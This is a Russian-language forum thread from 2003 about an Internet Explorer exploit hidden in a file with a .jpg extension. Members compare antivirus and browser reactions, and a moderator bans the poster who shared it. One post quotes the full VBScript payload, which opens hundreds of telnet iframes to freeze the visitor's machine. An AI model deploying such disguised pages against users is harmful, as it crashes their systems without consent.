Help - Search - Member List - Calendar
Full Version: Показательный пример владельцам Internet Explorer
Форумы RDA > Технический раздел > Общие вопросы
Boo
user posted image

Как видите, exploit эффективно запускает под IE любой код (в данном случае кучу telnet коннектов), хотя нично не мешает злоумышленнику написать shellcode или HDD форматер...
Если есть альтернативные броузеры (Mozilla, Opera, etc), есть резон юзать оные
Cronus
Мндя, у меня запустилось 296 коннектов... Потом вылезло Out of memory.
alossenko
у меня сработал Symantec Antivirus Corporate smile.gif

QUOTE
Scan type:  Realtime Protection Scan
Event:  Virus Found!
Virus name: IFrame.Exploit
File:  C:\.......\ie_exploit__it_is_your_own_fault_if_you_open_it[1].jpg
Location:  C:\.......\UNQFQP2V
Action taken:  Delete succeeded : Access denied


За такие показательные примеры по башке настучать можно mad.gif
SINtez
Антивирусник отрюхал его!
Невижу смысла переходить на что-то!
Меня устраивает и ИЕ! Пускай дырявый и глюкавый!

2 boo:
Тебе чего за рекламу альтернативных програм деньги платють? Или ты на добровольных началах? winkold.gif cwm4.gif cwm4.gif
[Dominant]
А у меня вообще ничего не произошло... Что я делаю не так? unsure.gif
XAHC
2 alossenko: аналогично smileold.gif
Korax
и у меня ничего...
Yanch
boo лишен всех прав на 3 дня, за постинг эксплоитов без предупреждения.

Кто-нить, уберите линк из его поста и перекиньте тему.
sanderp
У меня Нортон антивирус тоже выскакивает!
RaZoR
если скопировать ссылку на jpg и открыть в отдельном окне то получается красивее... smileold.gif
Korax
QUOTE (RaZoR @ Вторник, 04 Ноября 2003, 15:35)
если скопировать ссылку на jpg и открыть в отдельном окне то получается красивее... smileold.gif

Спасибо, пожалуй лучше не будем... cwm4.gif
kvappa
Да, действительно красиво! smileold.gif
Только почему он прямо со страницы у меня не работает? Только в отдельном окне.
alossenko
от этой красоты упал мой файрволл (Sygate Pro) zub.gif
RaZoR
не спас и F-Secure zub.gif
zoolook
QUOTE
boo лишен всех прав на 3 дня, за постинг эксплоитов без предупреждения.

Подумать только, на целых три дня! winkold.gif
Вроде он подписал, что заходим на свой страх и риск

QUOTE
если скопировать ссылку на jpg и открыть в отдельном окне то получается красивее...

Видимо изначально это и задумывалось cool.gif



Я так понимаю, что идея была показать народу, что на данный момент угрозу в себе таят даже простые картики

З.Ы. AVP у меня ругнулся, что типа вирус, однако не смог заблокировать запуск.. это тоже наводит на размышление
kvappa
Странно, у приятеля AVP всё нахрен сразу рубанул. У него AVP 3.6.*

А JPG полностью из HTML-кода состоит. Только хз, как это запускают. smileold.gif
zoolook
QUOTE
Странно, у приятеля AVP всё нахрен сразу рубанул. У него AVP 3.6.*

Значит у меня AVP халтурит на работе. Завтра проверю.

QUOTE
А JPG полностью из HTML-кода состоит. Только хз, как это запускают. smileold.gif

Точно так, IFRAME уязвимость (даже не exploit), походу IE пофиг на расширение файла (анализирует первые байты файла?)
alossenko
чето я не понял. установил оперу. захожу сюда и такая-же херня. срабатывает антивирь.
сейчас Firebird попробую
Zolo
Имхо оч. интересный скрипт...
неплохо вешает тачку biggrinold.gif
вот его до ужаса простй html код на VB написан
(правда скрипт 8 раз вписан- грузит одноврменно 8 окон тельнета*800 раз) -так что хрен скроешся как говориться smileold.gif

QUOTE
<html>
<body>
<H1> netric 0wnz y00! </H1>
<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>
</body>
</html>
zoolook
QUOTE (alossenko @ Вторник, 04 Ноября 2003, 22:36)
чето я не понял. установил оперу. захожу сюда и такая-же херня. срабатывает антивирь.
сейчас Firebird попробую

И ежу понятно, что антивирь будет срабатывать.
Открывай хоть нотпадом winkold.gif
zoolook
QUOTE (Zolo @ Вторник, 04 Ноября 2003, 22:40)
Имхо оч. интересный скрипт...

Вот и я про тоже.
Человек хотел поделиться интересным, а его в бан сразу winkold.gif
alossenko
а вот у Mozilla Firebird всё в порядке. антивирус не вопит, картинка не загружается.
даже если её в ручную попробовать открыть - пишет "а вот хрен тебе, картинка содержит ошибки и не будет открыта"

только я одно не понимаю. почему создатель скрипта не мог в одну строку всё написать?

или чтобы вообще весело было - открывал бы telnet рекурзивно до бесконечности smileold.gif
Zolo
QUOTE (zoolook @ Вторник, 04 Ноября 2003, 22:53)
QUOTE (Zolo @ Вторник, 04 Ноября 2003, 22:40)
Имхо оч. интересный скрипт...

Вот и я про тоже.
Человек хотел поделиться интересным, а его в бан сразу winkold.gif

Это смотря в аком виде его показать, если как готовый обраец творчества то одно-этотипа зловредный продукт biggrinold.gif , а если как я просто его код, то другое... winkold.gif
alossenko
QUOTE (zoolook @ Вторник, 04 Ноября 2003, 21:50)
И ежу понятно, что антивирь будет срабатывать.
Открывай хоть нотпадом winkold.gif

ежу ничего не понятно smileold.gif читай пост выше. с Мозиллой никаких аномалий не обнаружено smile.gif
zoolook
QUOTE (alossenko @ Вторник, 04 Ноября 2003, 22:55)
только я одно не понимаю. почему создатель скрипта не мог в одну строку всё написать?

или чтобы вообще весело было - открывал бы telnet рекурзивно до бесконечности smileold.gif

видимо для создания веса.
Картинку длиной 30 байт никто бы не стал смотреть.
А так повторяющиеся циклы создают приличный размер файла
WeedLover
Ну мля мудила, правильно таварищи за такое по башке следует дать cwm28.gif
И посильнее rotfl.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2025 Invision Power Services, Inc.